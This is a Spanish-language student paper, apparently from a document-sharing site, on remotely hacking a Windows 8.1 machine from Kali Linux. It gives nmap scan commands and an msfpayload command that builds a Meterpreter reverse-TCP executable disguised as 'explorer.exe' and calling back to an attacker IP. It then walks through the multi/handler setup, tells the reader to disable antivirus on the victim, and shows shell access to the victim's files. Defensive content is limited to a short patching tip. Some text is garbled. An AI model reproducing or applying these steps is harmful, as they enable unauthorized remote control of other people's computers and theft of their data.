Вы находитесь на странице: 1из 4

KALI LINUX-WINDOWS 8

Hack de windows
Andrade Bravo Andy Jos
Andyjose1994@hotmail.com

Pico Aponte Grecia Magaly


zuriel.magy@yahoo.com

AbstractThis paper shows a process and the basic commands


to get into a window machine located in our own network, and
then to perform secretly and silently actions. In addition tambe
possible security measures they are to prevent these computer
attacks.
Kali linux, puerto, windows, seguridad, exploit, shell,
meterpreter.

I.

INTRODUCCION

Kali Linux es un software de cdigo abierto(linux),


enfocado a la seguridad de las redes informticas, kali Linux
posee un sinnmero de prestaciones o servicios orientados
especficamente al escaneo de usuarios conectados a una red
es decir determina las ips usadas en una red y nos permite
tambin obtener la informacin del dispositivo con una ip
especifica o tambin realiza un escaneo de forma global.
Este sistema permite realizar sigilosamente mediante un
comando meterpreter que se ejecuta despus de la
vulneracin de un sistema operativo y as mediante
comando de Windows hacer o crear proceso en el sistema
operativo vulnerado.

II.

estndares de desarrollo de Debian. Toda la nueva


infraestructura ha sido puesta en el lugar, todas las
herramientas fueron revisadas y fueron embaladas. [1]
nmap
Kali Linux contiene una serie de aplicaciones o
herramientas para uso de escaneo, una de estas es nmap el
cual es un programa de cdigo abierto que sirve para
evaluar el estado de los puertos de una maquina (abiertos o
cerrados), desde el termina de kali Linux este tiene varias
formas para su uso el cual agilita la revisin de una red. [2]
Los formatos y sus usos son los siguientes:
Para ver las ips en uso de una red

nmap sP ip_de_inicio/macara_de_red
nmap -sP xxx.xxx.xxx.xxx/mascara de red

Para escanear un nico host y obtener informacin acerca de


sus puertos abiertos.

nmap ip_de_host

Para
obtener informacin sobre el sistema
operativo de la victima

KALI LINUX

Kali Linux es una distribucin de Linux avanzada para


pruebas de penetracin y auditoras de seguridad.
Kali es una completa re-construccin de BackTrack Linux
desde la base hacia arriba, y se adhiere completamente a los

En informtica, el trmino Shell se emplea para referirse


a aquellos programas que proveen una interfaz de usuario
para acceder a los servicios del sistema operativo. Estos
pueden ser grficos o de texto simple, dependiendo del tipo
de interfaz que empleen. Los Shell estn diseados para
facilitar la forma en que se invocan o ejecutan los distintos
programas disponibles en el computador.
III.

METODOLOGIA

Mediante el siguiente proceso tendremos acceso a una


maquina de windows 8.1 mediante el ternimal de Kali
Linux.

metasploit
MetaSploit permite ser ejecutado de diferentes formas,
desde linea de comandos con msfcli, en donde se aceptan
cada uno de los comandos metasploit de forma
independiente, por interfaz web (deprecada en las ltimas
versiones y disponible nicamente en versiones antiguas), o
por medio de la consola unificada de metasploit llamada
msfconsole (se trata de un interprete de comandos bastante
robusto que es el sustituto de la interfaz web), esta ltima es
la mas utilizada por aquellos que utilizan metasploit para
realizar sus pruebas de penetracin. [3]

Primeramente debemos tener una maquina con el


Sistema Operativo Kali Linux, quien sera el
atacante en red con una maquina de windows 8.1
que sera la victima.
Ingresamos al terminal de nuestra maquina virtual
kali Linux y mediante el codigo ifconfig vemos la
direccion ip de nuestra maquina
Luego de conocer nuestra direccion ip mediante el
codigo msfpayload windows /meterpreter
/reverse_tcp
LHOST=192.168.221.129
LPORT=8080 x > /root/Desktop/explorer.exe
creamos el archivo ejecutable que nos permitira
el acceso a windows, para ello en el comando
LHOST= asignamos la direccion ip de atacante y
en root asignamos la direccion el la cual en se
creara nuestro archivo ejecutable, dicho archivo
debemos copiarlo en la maquina victima. EL
mensaje (Created by msfpayload.) que aparece
en la imagen nos permitira saber que el achivo
ejecutable se ha creado correctamente.

exploit
Un exploit es conocido como un malware, fragmento de
software, o cdigo malicioso, que se usa para aprovechar
los fallos en los sistemas informticos y de esta manera
poder violar su seguridad e ingresar a su medio o sistema
operativo. [4]

Shell

Posteriormente ingresamos a msfconsole quien es


un interprete de comandos para continuar cn
nuestro objetivo.
Ya dentro de msfconsole digitamos el codigo use
exploit/multi/handler para elegir el exploit en
este caso handler que no es mas que un comando
para establecer la conexin dependiendo contra una

victima en un puerto determinado, mediante set


PAYLOAD windows /meterpreter/reverse_tcp

A continuacin indicamos la direccin ip atacante y


el puerto mediante el cual lo va hacer por medios
de los comandos, set LHOST 192.168.221.129 y
set LPORT 8080 correspondientemente. El puerto
8080 es TCP, Puerto alternativo para el servicio
web Apache.

Hecho esto nos queda ejecutar el comando exploit,


mismo que que explota una o varias
vulnerabilidades en un software determinado,
frecuentemente es utilizado para ganar acceso a un
sistema y tener un nivel de control sobre l. [1]

Para ingresar al comando meterpreter el archivo


.exe copiado en Windows debe ser ejecutado, al
hacerlo estaremos dentro de meterpreter. Al
ingresar el comando sysinfo tenemos acceso a la
informacin del sistema, del host vctima. Para
poder copiar el archivo en Windows debemos
desactivar nuestro antivirus.

Mediante el comando Shell accedemos a la


ubicacin donde esta copiado el archivo .exe en
Windows y por medio del comando dir se pueden
viualizar los archivos que esa ubicacin contiene.

En este punto nosotros tenemos total acceso al


host vctima y podemos crear archivos en el
terminal de kali y visualizarlos en Windows.

Para salir solo digitamos exit

IV.

CONCLUSIONES

Ningn equipo es totalmente seguro ya que


mediante diversas herramientas existentes hoy en
da en el
medio nosotros podemos acceder
remotamente a la informacin de otros, para
realizar esta actividad se debe tener en cuenta que
no es legal porque se estn irrespetando la
privacidad ajena.

Para atacar un equipo es importante conocer que


sistema operativo maneja su direccin ip, eso

mediante el rastreo brindado por nmap . Como


tambin se debe tomar en cuenta porque puerto se
va a ingresar.

posibles sanciones si se pratica este proceso de


hackeo.
VI . REFERENCIAS

Una vez dentro de la maquina victima nosotros


podemos conocer la informacin especfica acerca
de su sistema, crear remotamente cualquier tipo de
archivos, acceder a su informacin personal o
modificar la informacin que nosotros deseemos.

Un exploit que significa "el uso de algo a la propia


ventaja" es una parte de software, un fragmento de
datos, o una secuencia de comandos que se
aprovecha de un error o vulnerabilidad con el fin
de entrar silenciosamente y poder controlar un
sistema operativo remotamente
de causar involuntario o comportamiento
imprevisto que se produzca en software, hardware,
o algo electrn.

V.

RECOMENDACIONES

Para evitar estos posibles ataques, es recomendable


actualizar constantemente las aplicaciones y
sistemas de nuestro computador ya que las
posteriores versiones tratan de corregir estos fallos.

Este tema es un asunto severo en cuanto a los


reglamentos establecidos, es necesario conocer los

[1]

[2]
[3]

[4]
[5]

elHacker, "Kali Linux," 23 01 2014. [Online].


Available: http://blog.elhacker.net/2014/01/kali-linuxlistado-completo-de-herramientas-tools.html .
[Accessed 29 06 2015].
Wikipedia, "Nmap," [Online]. Available:
https://es.wikipedia.org/wiki/Nmap . [Accessed 29 06
2015].
"Seguridad en Sistemas y Tcnicas de Hacking.
TheHackerWay (THW)," 1013. [Online]. Available:
http://thehackerway.com/2011/03/11/comandos-yconceptos-basicos-metasploit-framework/. [Accessed
29 06 2015].
25 03 2015. [Online]. Available:
https://es.wikipedia.org/wiki/Exploit. [Accessed 06
2015].
Adastra, "blog," 11 marzo 2011. [Online]. Available:
http://thehackerway.com/2011/03/11/comandos-yconceptos-basicos-metasploit-framework/. [Accessed
30 junio 2015].

Вам также может понравиться